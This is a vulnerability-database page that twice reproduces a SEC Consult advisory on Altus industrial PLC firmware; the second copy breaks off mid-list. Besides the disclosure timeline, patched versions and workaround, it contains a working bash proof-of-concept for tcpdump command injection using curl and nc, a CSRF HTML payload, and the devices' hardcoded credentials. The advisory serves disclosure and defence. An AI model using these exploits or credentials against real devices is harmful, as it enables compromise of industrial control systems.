DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:163889", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Altus Sistemas de Automacao Products CSRF / Command Injection / Hardcoded Credentials", "description": "", "published": "2021-08-19T00:00:00", "modified": "2021-08-19T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://packetstormsecurity.com/files/163889/Altus-Sistemas-de-Automacao-Products-CSRF-Command-Injection-Hardcoded-Credentials.html", "reporter": "T. Weber", "references": [], "cvelist": ["CVE-2017-16544", "CVE-2021-39243", "CVE-2021-39244", "CVE-2021-39245"], "immutableFields": [], "lastseen": "2021-08-19T17:23:50", "viewCount": 168, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-201803-1", "ASA-201803-2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:A2C1214772F351A51ABA0A47D3042A74"]}, {"type": "cve", "idList": ["CVE-2017-16544", "CVE-2021-39243", "CVE-2021-39244", "CVE-2021-39245"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1445-1:15231", "DEBIAN:DLA-1445-1:1C330", "DEBIAN:DLA-2559-1:C6843"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-16544"]}, {"type": "gentoo", "idList": ["GLSA-201803-12"]}, {"type": "ibm", "idList": ["B05329785ED4441E67419C72F4E8D5EFB095312F0129B7DAC17DB1F2F0780EEC"]}, {"type": "ics", "idList": ["ICSA-20-240-01"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2559.NASL", "GENTOO_GLSA-201803-12.NASL", "OPENSUSE-2022-0135-1.NASL", "SUSE_SU-2022-0135-1.NASL", "SUSE_SU-2022-0135-2.NASL", "UBUNTU_USN-3935-1.NASL", "VMWARE_ESXI_VMSA-2019-0013.NASL", "VMWARE_VMSA-2019-0013.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310843963", "OPENVAS:1361412562310891445"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153278", "PACKETSTORM:154361", "PACKETSTORM:156729", "PACKETSTORM:158990", "PACKETSTORM:159064", "PACKETSTORM:160933"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-16544"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2022:0135-1"]}, {"type": "ubuntu", "idList": ["USN-3935-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-16544"]}, {"type": "vmware", "idList": ["VMSA-2019-0013", "VMSA-2019-0013.1"]}, {"type": "zdt", "idList": ["1337DAY-ID-36662"]}], "rev": 4}, "score": {"value": 6.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "archlinux", "idList": ["ASA-201803-1", "ASA-201803-2"]}, {"type": "cve", "idList": ["CVE-2017-16544"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1445-1:1C330"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-16544"]}, {"type": "gentoo", "idList": ["GLSA-201803-12"]}, {"type": "ibm", "idList": ["B05329785ED4441E67419C72F4E8D5EFB095312F0129B7DAC17DB1F2F0780EEC"]}, {"type": "ics", "idList": ["ICSA-20-240-01"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-201803-12.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891445"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159064"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-16544"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2022:0135-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-16544"]}, {"type": "vmware", "idList": ["VMSA-2019-0013"]}, {"type": "zdt", "idList": ["1337DAY-ID-36662"]}]}, "exploitation": null, "vulnersScore": 6.2}, "sourceHref": "https://packetstormsecurity.com/files/download/163889/SA-20210819-0.txt", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20210819-0 > \n======================================================================= \ntitle: Multiple Critical Vulnerabilities \nproduct: Multiple Altus Sistemas de Automacao products: \nNexto NX30xx Series \nNexto NX5xxx Series \nNexto Xpress XP3xx Series \nHadron Xtorm HX3040 Series \nvulnerable version: See \"Vulnerable / tested versions\" \nfixed version: See \"Solution\" \nCVE number: CVE-2021-39243, CVE-2021-39243, CVE-2021-39243 \nimpact: Critical \nhomepage: https://www.altus.com.br/ \nfound: 2020-05-20 \nby: D. Teuchert \nT. Weber (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult, an Atos company \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"As a reference for the automation market for more than 35 years, Altus \nSistemas de Automa\u00e7\u00e3o S.A. offers a complete line of products that meet a wide \nrange of customers\u2019 needs in several areas of the domestic and international \nmarkets. Developed with own technology, our solutions deliver high added value \nto our customers businesses, enabling productivity, safety and reliability for \nindustrial automation applications and industrial automation processes. \n \nWe are a member of Parit Participa\u00e7\u00f5es, a holding company in the technology \nsector, which also controls Teikon S.A., a company with operations on the \nelectronic manufacturing market, and RT Tecnologia M\u00e9dica, a company that \noperates in the radiological market.\" \n \nSource: https://www.altus.com.br/sobre \n \nBusiness recommendation: \n------------------------ \nThe vendor provides a patch which should be installed immediately. \n \nSEC Consult recommends to perform a thorough security review of these \nproducts conducted by security professionals to identify and resolve all \nsecurity issues. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Authenticated Semi-Blind Command Injection via Parameter Injection (CVE-2021-39244) \nThe getlogs.cgi script allows authenticated users to start tcpdump on the \ndevice. By injecting payloads into specific parameters it is also possible to \nexecute arbitrary OS commands. The output of these commands can be obtained in \nanother step. \n \n2) Cross-Site Request Forgery (CSRF) (CVE-2021-39243) \nThe web interface that is used to set all configurations is vulnerable to \ncross-site request forgery attacks. An attacker can change settings this way by \nluring the victim to a malicious website. \n \n3) Hardcoded Credentials for CGI Endpoint (CVE-2021-39245) \nThe getlogs.cgi script is exclusively htaccess-protected with hardcoded \ncredentials. These are shared with all firmware images from the series NX30xx, \nHX30xx and XP3xx. These hardcoded credentials can be used to access the device \nwithout a valid user account on application level and cannot be changed in the \nuser interface. \n \nIn combination with vulnerability 1), a full compromization on system level \nwith the only precondition of network access can be done. \n \n4) Outdated and Vulnerable Software Components \nA static scan with the IoT Inspector revealed outdated software packages that \nare used in the devices' firmware. \n \nThe used BusyBox toolkit is outdated and contains multiple known \nvulnerabilities. The outdated version was found by IoT Inspector. One of the \ndiscovered vulnerabilities (CVE-2017-16544) was verified by using the MEDUSA \nscalable firmware runtime. \n \n \nProof of concept: \n----------------- \n1) Authenticated Semi-Blind Command Injection via Parameter Injection (CVE-2021-39244) \nThe following firmware extract of getlogs.cgi displays the vulnerability: \n------------------------------------------------------------------------------- \nTCPDUMP_IFACE=`echo \"$QUERY_STRING\" | sed -n 's/^.*tcpdump_iface=\\([^&]*\\).*$/\\1/p' | sed \"s/%20/ /g\"` \nTCPDUMP_COUNT=`echo \"$QUERY_STRING\" | sed -n 's/^.*tcpdump_count=\\([^&]*\\).*$/\\1/p' | sed \"s/%20/ /g\"` \n[...] \necho \"tcpdump is running ...\" \necho \"<p>Please, wait the capture of $TCPDUMP_COUNT packets in $TCPDUMP_IFACE.</p>\" \nchrt -p -f 70 $$ \ntcpdump -i $TCPDUMP_IFACE -c $TCPDUMP_COUNT -w /tmp/capture.pcap \nmount / -o rw,remount \nln -s /tmp/capture.pcap /usr/www/capture.pcap \nmount / -o ro,remount \necho \"<a href=\\\"capture.pcap\\\" download=\\\"$TCPDUMP_IFACE-capture.pcap\\\">Click here to download the capture file</a>\" \n------------------------------------------------------------------------------- \nAs it can be seen, the variables $TCPDUMP_COUNT and $TCPDUMP_IFACE are used \nunfiltered in the tcpdump command. This means, that it is possible to inject \narbitrary parameters to the tcpdump command. The flag -z for tcpdump allows to \ndefine a program that will run on the capture file. This behaviour can be used \nto execute arbitrary commands. The following request injects parameters, so \nthat tcpdump listens on UDP port 1234 and will execute the capture file with \nsh: \n------------------------------------------------------------------------------- \nGET /getlogs.cgi?logtype=tcpdump&tcpdump_iface=eth0&tcpdump_count=1%20-G%201%20-z%20sh%20-U%20-A%20udp%20port%201234 HTTP/1.1 \nHost: $IP \nAuthorization: Basic YWx0dXM6bmV4dG8xMjM0 \n \n------------------------------------------------------------------------------- \nThe next step to exploit this vulnerability is to send the commands to UDP port \n1234: \n \n$ echo -e \";\\n$CMD &>/tmp/capture.pcap;\\n'\\n$CMD &>/tmp/capture.pcap;\" | nc -u $TARGET_HOST $UDP_PORT \n \nThe command is sent twice because it is possible, that the capture file \ncontains a \"'\" before the sent payload. Injecting the commands twice with a \"'\" \nin between makes sure, that the command will be executed by sh and not \ninterpreted as a string. The output of the executed command is redirected to \nthe file capture.pcap which can be accessed via the following request: \n------------------------------------------------------------------------------- \nGET /capture.pcap HTTP/1.1 \nHost: $IP \n------------------------------------------------------------------------------- \nThese three steps are combined in the following proof of concept script: \n------------------------------------------------------------------------------- \n#!/bin/bash \n#Author: D. Teuchert \nCMD=\"whoami\" \nif [[ $# -eq 1 ]]; then \nCMD=$1 \nfi \nTARGET_HOST=\"192.168.100.123\" \nUDP_PORT=1234 \nBASIC_AUTH_USERNAME=\"altus\" \nBASIC_AUTH_PASSWORD=\"nexto1234\" \nBASIC_AUTH_HEADER=$(printf \"$BASIC_AUTH_USERNAME:$BASIC_AUTH_PASSWORD\" | base64) \n \n#Sending HTTP request with parameter injection in tcpdump \n#Break out of tcpdump is done via a technique described here: \n#https://insinuator.net/2019/07/how-to-break-out-of-restricted-shells-with-tcpdump/ \ncurl -s -k -X \"GET\" -H \"Host: $TARGET_HOST\" -H \"Authorization: Basic $BASIC_AUTH_HEADER\" \"http://$TARGET_HOST/getlogs.cgi?logtype=tcpdump&tcpdump_iface=eth0&tcpdump_count=1%20-G%201%20-z%20sh%20-U%20-A%20udp%20port%20$UDP_PORT\">/dev/null & \n#Send udp packet with payload \necho -e \";\\n$CMD &>/tmp/capture.pcap;\\n'\\n$CMD &>/tmp/capture.pcap;\" | nc -u $TARGET_HOST $UDP_PORT \necho -e \"Executed \\\"$CMD\\\".\\nResponse:\" \n#The output of the executed command was saved in capture.pcap \ncurl -s -k -X \"GET\" -H \"Host: $TARGET_HOST\" \"http://$TARGET_HOST/capture.pcap\" \n------------------------------------------------------------------------------- \n \n2) Cross-Site Request Forgery (CSRF) (CVE-2021-39243) \nThe following CSRF proof-of-concept can be used to do the first step of the \ncommand Injection exploitation: \n------------------------------------------------------------------------------- \n<html> \n<body> \n<script>history.pushState('', '', '/')</script> \n<form action=\"http://$IP/getlogs.cgi\"> \n<input type=\"hidden\" name=\"logtype\" value=\"tcpdump\" /> \n<input type=\"hidden\" name=\"tcpdump_iface\" value=\"eth0\" /> \n<input type=\"hidden\" name=\"tcpdump_count\" value=\"1 -G 1 -z sh -U -A udp port 1234\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n------------------------------------------------------------------------------- \n \n3) Hardcoded Credentials for CGI Endpoint (CVE-2021-39245) \nThe hardcoded credentials are present under \"/etc/lighttpd/lighttpd-auth.conf\": \naltus:nexto1234 \n \nThese credentials are exclusively used for the getlogs.cgi script. This is also \ndescribed in the lighttpd.conf which is located under the same directory: \n------------------------------------------------------------------------------- \n[...] \nauth.debug = 0 \nauth.backend = \"plain\" \nauth.backend.plain.userfile = \"/etc/lighttpd/lighttpd-auth.conf\" \n \nauth.require = ( \"/cgi/getlogs.cgi\" => \n( \n\"method\" => \"basic\", \n\"realm\" => \"Password protected area\", \n\"require\" => \"user=altus\" \n) \n) \n[...] \n------------------------------------------------------------------------------- \n \n4) Outdated and Vulnerable Software Components \nBased on an automated scan with the IoT Inspector the following third party \nsoftware packages were found to be outdated: \n \nAltus/Beijer XP3xx: \nBusyBox 1.19.4 \nGNU glibc 2.19 \nlighttpd 1.4.30 \nLinux Kernel 4.9.98 \nOpenSSH 5.9p1 \nOpenSSL 1.0.0g \nOpenSSL 1.1.1b (in CODESYS) \nCODESYS Control 3.5.15 \n \nAltus/Beijer NX30xx: \nBusyBox 1.1.3 \nDropbear SSH 0.45 \nGNU glibc 2.5 \nlighttpd 1.4.24-devel-v1.0.0.7-1727-g6fd3998 \nLinux Kernel 2.6.23 \nOpenSSL 0.9.8g \nOpenSSL 1.1.1b (in CODESYS) \nCODESYS Control 3.5.15 \n \nAltus/Beijer HX30xx: \nBusyBox 1.19.4 \nGNU glibc 2.11.1 \nlighttpd 1.4.30 \nLinux Kernel 3.0.75 \nOpenSSH 5.9p1 \nOpenSSL 1.0.0g \nOpenSSL 1.0.2j (in CODESYS) \nCODESYS Control 3.5.12.65 \n \nThe BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on \nan emulated device: \n \nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the \nvulnerability. \n------------------------------------------------------------------------------- \n# ls \"pressing <TAB>\" \ntest \n55\\;test.txt \n# \n------------------------------------------------------------------------------- \n \nThe vulnerabilities 1), 2), 3), 4) were manually verified on an emulated device \nby using the MEDUSA scalable firmware runtime. \n \nVulnerable / tested versions: \n----------------------------- \nThe following firmware versions have been found to be vulnerable: \nAltus/Beijer Nexto NX3003 / 1.8.11.0 \nAltus/Beijer Nexto NX3004 / 1.8.11.0 \nAltus/Beijer Nexto NX3005 / 1.8.11.0 \nAltus/Beijer Nexto NX3010 / 1.8.3.0 \nAltus/Beijer Nexto NX3020 / 1.8.3.0 \nAltus/Beijer Nexto NX3030 / 1.8.3.0 \nAltus/Beijer Nexto Xpress XP300 / 1.8.11.0 \nAltus/Beijer Nexto Xpress XP315 / 1.8.11.0 \nAltus/Beijer Nexto Xpress XP325 / 1.8.11.0 \nAltus/Beijer Nexto Xpress XP340 / 1.8.11.0 \nAltus/Beijer Hadron Xtorm HX3040 / 1.7.58.0 \n \nThe following versions are also vulnerable according to the vendor: \nAltus/Beijer Nexto NX5100 / 1.8.11.0 \nAltus/Beijer Nexto NX5101 / 1.8.11.0 \nAltus/Beijer Nexto NX5110 / 1.1.2.8 \nAltus/Beijer Nexto NX5210 / 1.1.2.8 \n \nVendor contact timeline: \n------------------------ \n2020-05-25: Contacting VDE CERT through info@cert.vde.com. Received \nconfirmation from VDE CERT. \n2020-05-01 - 2020-09-01: Multiple emails and telephone calls with VDE CERT. \nVDE CERT contacts said, that the vendor did not respond on any \nmessages or calls. \n2020-09-30: Wrote a message to the SVP R&D and Supply Chain of Beijer \nElectronics. No answer. \n2020-10-05: Call with the helpdesk of Beijer Electronics AB. The contact stated \nthat no case regarding vulnerabilities were opened and created one. \nThe product owners of Westermo, Korenix and Beijer Electronics were \ninformed via this inquiry. Set disclosure date to 2020-11-25. \n2020-10-06: Restarted the whole responsible disclosure process by sending a \nrequest to the new security contact cs@beijerelectronics.com. \n2020-11-11: Asked the representatives of Korenix and Beijer regarding the \nstatus. No answer. \n2020-11-25: Phone call with security manager of Beijer. Sent advisories via \nencrypted archive to cs@beijerelectronics.com. Received \nconfirmation of advisory receipt. Security manager told us that he \ncan provide information regarding the time-line for the patches \nwithin the next two weeks. \n2020-12-09: Asked for an update. \n2020-12-18: Call with security manager of Beijer. Vendor presented initial \nanalysis done by the affected companies, also Altus. Preliminary \nplans to fix the vulnerabilities were presented. Altus stated to \nfix issue #1 in January and the other vulnerabilities in March or \nApril. \n2021-03-21: Security manager invited SEC Consult to have a status meeting. \n2021-03-25: Altus fixed vulnerability #1. Handover of the advisory handling to \nAltus employees will be done in April. Vendor released fixed \nfirmware regarding issue #1. \n2021-04-09: Meeting with Altus. Vendor did not agree with another potentially \nvulnerability, which was identified on the emulated device. Thus, \nit was removed from the advisory. Vulnerabilities #2 and #3 were \nplanned to be fixed earlier this year but the releases shifted due \nto Covid. The new firmware version will be released in July 2021. \n2021-04-22: Asked for an update; No answer. \n2021-05-04: Asked for an update. \n2021-05-07: Vendor was working on the security fixes. \n2021-05-11: Vendor sent timeline for fixes and detailed version information. \nTwo additional models were added to the affected devices by the \nvendor. \n2021-06-10: Added additional information and asked if more time will be needed. \n2021-06-10: Vendor added affected version numbers and asked for the 1st of \nAugust as new release date. \n2021-06-15: Set the release date to 1st of August. \n2021-07-28: Vendor sent the version numbers for the fixed firmware and asked \nfor postponing the release to 6th of August for completing the \ndocumentation. \n2021-08-16: Due to holiday, the SEC Consult Vulnerability was closed. Informed \nvendor to release the advisory in the next four days. \n2021-08-17: Received CVE IDs. \n2021-08-18: Informed vendor to release the advisory on 2021-08-19. \n2021-08-19: Coordinated release of security advisory. \n \nSolution: \n--------- \nAccording to the vendor the following patches must be applied to fix issue 1), \n2) and 3): \n \nXP300 - v1.11.2.0 \nXP315 - v1.11.2.0 \nXP325 - v1.11.2.0 \nXP340 - v1.11.2.0 \nBCS-NX3003 - v1.11.2.0 \nBCS-NX3004 - v1.11.2.0 \nBCS-NX3005 - v1.11.2.0 \nBCS-NX3010 - v1.9.1.0 \nBCS-NX3020 - v1.9.1.0 \nBCS-NX3030 - v1.9.1.0 \nBCS-NX5100 - v1.11.2.0 \nBCS-NX5101 - v1.11.2.0 \nBCS-NX5110 - v1.11.2.0 \nBCS-NX5210 - v1.11.2.0 \nBCS-HX3040 - v1.11.2.0 \n \nVendor's statement regarding issue 4): \n\"Altus continuously integrates new features and fixes in the products, \nreleasing new firmware versions. Often those improvements require the software \npackages upgrading for several reasons, including security. When this happens, \nwe perform a set of tests to ensure that the performance, reliability, and \nsecurity were not negatively impacted by the upgrades. Although there are known \nvulnerabilities in some software package versions, those vulnerabilities can \nonly be exploited if we compile those specific features and provide the means \nto exploit them. The issue pointed out by SEC Consult, for instance, requires a \nterminal to be exploited, which we don't provide in real hardware. Nowadays, \nthere isn't any known exploitable vulnerability caused by outdated software \npackages in our products. Therefore, this item isn\u2019t considered a vulnerability \nby us.\" \n \n \nWorkaround: \n----------- \nRestrict network access to the device. \n \n \nAdvisory URL: \n------------- \nhttps://sec-consult.com/vulnerability-lab/ \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult, an Atos company \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an \nAtos company. It ensures the continued knowledge gain of SEC Consult in the \nfield of network and application security to stay ahead of the attacker. The \nSEC Consult Vulnerability Lab supports high-quality penetration testing and \nthe evaluation of new offensive and defensive technologies for our customers. \nHence our customers obtain the most current information about vulnerabilities \nand valid recommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://sec-consult.com/career/ \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://sec-consult.com/contact/ \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF Daniel Teuchert, Thomas Weber / @2021 \n \n`\n", "_state": {"dependencies": 1647589307, "score": 0}}

{"zdt": [{"lastseen": "2021-12-20T17:33:51", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-19T00:00:00", "type": "zdt", "title": "Altus Sistemas de Automacao Products CSRF / Command Injection / Hardcoded Credentials Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39243", "CVE-2021-39245", "CVE-2017-16544", "CVE-2021-39244"], "modified": "2021-08-19T00:00:00", "id": "1337DAY-ID-36662", "href": "https://0day.today/exploit/description/36662", "sourceData": "=======================================================================\n title: Multiple Critical Vulnerabilities\n product: Multiple Altus Sistemas de Automacao products:\n Nexto NX30xx Series\n Nexto NX5xxx Series\n Nexto Xpress XP3xx Series\n Hadron Xtorm HX3040 Series\n vulnerable version: See \"Vulnerable / tested versions\"\n fixed version: See \"Solution\"\n CVE number: CVE-2021-39243, CVE-2021-39243, CVE-2021-39243\n impact: Critical\n homepage: https://www.altus.com.br/\n by: D. Teuchert\n T. Weber (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"As a reference for the automation market for more than 35 years, Altus\nSistemas de Automa\u00e7\u00e3o S.A. offers a complete line of products that meet a wide\nrange of customers\u2019 needs in several areas of the domestic and international\nmarkets. Developed with own technology, our solutions deliver high added value\nto our customers businesses, enabling productivity, safety and reliability for\nindustrial automation applications and industrial automation processes.\n\nWe are a member of Parit Participa\u00e7\u00f5es, a holding company in the technology\nsector, which also controls Teikon S.A., a company with operations on the\nelectronic manufacturing market, and RT Tecnologia M\u00e9dica, a company that\noperates in the radiological market.\"\n\nSource: https://www.altus.com.br/sobre\n\nBusiness recommendation:\n------------------------\nThe vendor provides a patch which should be installed immediately.\n\nSEC Consult recommends to perform a thorough security review of these\nproducts conducted by security professionals to identify and resolve all\nsecurity issues.\n\n\nVulnerability overview/description:\n-----------------------------------\n1) Authenticated Semi-Blind Command Injection via Parameter Injection (CVE-2021-39244)\nThe getlogs.cgi script allows authenticated users to start tcpdump on the\ndevice. By injecting payloads into specific parameters it is also possible to\nexecute arbitrary OS commands. The output of these commands can be obtained in\nanother step.\n\n2) Cross-Site Request Forgery (CSRF) (CVE-2021-39243)\nThe web interface that is used to set all configurations is vulnerable to\ncross-site request forgery attacks. An attacker can change settings this way by\nluring the victim to a malicious website.\n\n3) Hardcoded Credentials for CGI Endpoint (CVE-2021-39245)\nThe getlogs.cgi script is exclusively htaccess-protected with hardcoded\ncredentials. These are shared with all firmware images from the series NX30xx,\nHX30xx and XP3xx. These hardcoded credentials can be used to access the device\nwithout a valid user account on application level and cannot be changed in the\nuser interface.\n\nIn combination with vulnerability 1), a full compromization on system level\nwith the only precondition of network access can be done.\n\n4) Outdated and Vulnerable Software Components\nA static scan with the IoT Inspector revealed outdated software packages that\nare used in the devices' firmware.\n\nThe used BusyBox toolkit is outdated and contains multiple known\nvulnerabilities. The outdated version was found by IoT Inspector. One of the\ndiscovered vulnerabilities (CVE-2017-16544) was verified by using the MEDUSA\nscalable firmware runtime.\n\n\nProof of concept:\n-----------------\n1) Authenticated Semi-Blind Command Injection via Parameter Injection (CVE-2021-39244)\nThe following firmware extract of getlogs.cgi displays the vulnerability:\n-------------------------------------------------------------------------------\nTCPDUMP_IFACE=`echo \"$QUERY_STRING\" | sed -n 's/^.*tcpdump_iface=\\([^&]*\\).*$/\\1/p' | sed \"s/%20/ /g\"`\nTCPDUMP_COUNT=`echo \"$QUERY_STRING\" | sed -n 's/^.*tcpdump_count=\\([^&]*\\).*$/\\1/p' | sed \"s/%20/ /g\"`\n[...]\necho \"tcpdump is running ...\"\necho \"<p>Please, wait the capture of $TCPDUMP_COUNT packets in $TCPDUMP_IFACE.</p>\"\nchrt -p -f 70 $$\ntcpdump -i $TCPDUMP_IFACE -c $TCPDUMP_COUNT -w /tmp/capture.pcap\nmount / -o rw,remount\nln -s /tmp/capture.pcap /usr/www/capture.pcap\nmount / -o ro,remount\necho \"<a href=\\\"capture.pcap\\\" download=\\\"$TCPDUMP_IFACE-capture.pcap\\\">Click here to download the capture file</a>\"\n-------------------------------------------------------------------------------\nAs it can be seen, the variables $TCPDUMP_COUNT and $TCPDUMP_IFACE are used\nunfiltered in the tcpdump command. This means, that it is possible to inject\narbitrary parameters to the tcpdump command. The flag -z for tcpdump allows to\ndefine a program that will run on the capture file. This behaviour can be used\nto execute arbitrary commands. The following request injects parameters, so\nthat tcpdump listens on UDP port 1234 and will execute the capture file with\nsh:\n-------------------------------------------------------------------------------\nGET /getlogs.cgi?logtype=tcpdump&tcpdump_iface=eth0&tcpdump_count=1%20-G%201%20-z%20sh%20-U%20-A%20udp%20port%201234 HTTP/1.1\nHost: $IP\nAuthorization: Basic YWx0dXM6bmV4dG8xMjM0\n\n-------------------------------------------------------------------------------\nThe next step to exploit this vulnerability is to send the commands to UDP port\n1234:\n\n$ echo -e \";\\n$CMD &>/tmp/capture.pcap;\\n'\\n$CMD &>/tmp/capture.pcap;\" | nc -u $TARGET_HOST $UDP_PORT\n\nThe command is sent twice because it is possible, that the capture file\ncontains a \"'\" before the sent payload. Injecting the commands twice with a \"'\"\nin between makes sure, that the command will be executed by sh and not\ninterpreted as a string. The output of the executed command is redirected to\nthe file capture.pcap which can be accessed via the following request:\n-------------------------------------------------------------------------------\nGET /capture.pcap HTTP/1.1\nHost: $IP\n-------------------------------------------------------------------------------\nThese three steps are combined in the following proof of concept script:\n-------------------------------------------------------------------------------\n#!/bin/bash\n#Author: D. Teuchert\nCMD=\"whoami\"\nif [[ $# -eq 1 ]]; then\n CMD=$1\nfi\nTARGET_HOST=\"192.168.100.123\"\nUDP_PORT=1234\nBASIC_AUTH_USERNAME=\"altus\"\nBASIC_AUTH_PASSWORD=\"nexto1234\"\nBASIC_AUTH_HEADER=$(printf \"$BASIC_AUTH_USERNAME:$BASIC_AUTH_PASSWORD\" | base64)\n\n#Sending HTTP request with parameter injection in tcpdump\n#Break out of tcpdump is done via a technique described here:\n#https://insinuator.net/2019/07/how-to-break-out-of-restricted-shells-with-tcpdump/\ncurl -s -k -X \"GET\" -H \"Host: $TARGET_HOST\" -H \"Authorization: Basic $BASIC_AUTH_HEADER\" \"http://$TARGET_HOST/getlogs.cgi?logtype=tcpdump&tcpdump_iface=eth0&tcpdump_count=1%20-G%201%20-z%20sh%20-U%20-A%20udp%20port%20$UDP_PORT\">/dev/null &\n#Send udp packet with payload\necho -e \";\\n$CMD &>/tmp/capture.pcap;\\n'\\n$CMD &>/tmp/capture.pcap;\" | nc -u $TARGET_HOST $UDP_PORT\necho -e \"Executed \\\"$CMD\\\".\\nResponse:\"\n#The output of the executed command was saved in capture.pcap\ncurl -s -k -X \"GET\" -H \"Host: $TARGET_HOST\" \"http://$TARGET_HOST/capture.pcap\"\n-------------------------------------------------------------------------------\n\n2) Cross-Site Request Forgery (CSRF) (CVE-2021-39243)\nThe following CSRF proof-of-concept can be used to do the first step of the\ncommand Injection exploitation:\n-------------------------------------------------------------------------------\n<html>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action=\"http://$IP/getlogs.cgi\">\n <input type=\"hidden\" name=\"logtype\" value=\"tcpdump\" />\n <input type=\"hidden\" name=\"tcpdump_iface\" value=\"eth0\" />\n <input type=\"hidden\" name=\"tcpdump_count\" value=\"1 -G 1 -z sh -U -A udp port 1234\" />\n <input type=\"submit\" value=\"Submit request\" />\n </form>\n </body>\n</html>\n-------------------------------------------------------------------------------\n\n3) Hardcoded Credentials for CGI Endpoint (CVE-2021-39245)\nThe hardcoded credentials are present under \"/etc/lighttpd/lighttpd-auth.conf\":\naltus:nexto1234\n\nThese credentials are exclusively used for the getlogs.cgi script. This is also\ndescribed in the lighttpd.conf which is located under the same directory:\n-------------------------------------------------------------------------------\n[...]\nauth.debug = 0\nauth.backend = \"plain\"\nauth.backend.plain.userfile = \"/etc/lighttpd/lighttpd-auth.conf\"\n\nauth.require = ( \"/cgi/getlogs.cgi\" =>\n (\n \"method\" => \"basic\",\n \"realm\" => \"Password protected area\",\n \"require\" => \"user=altus\"\n )\n)\n[...]\n-------------------------------------------------------------------------------\n\n4) Outdated and Vulnerable Software Components\nBased on an automated scan with the IoT Inspector the following third party\nsoftware packages were found to be outdated:\n\nAltus/Beijer XP3xx:\nBusyBox 1.19.4\nGNU glibc 2.19\nlighttpd 1.4.30\nLinux 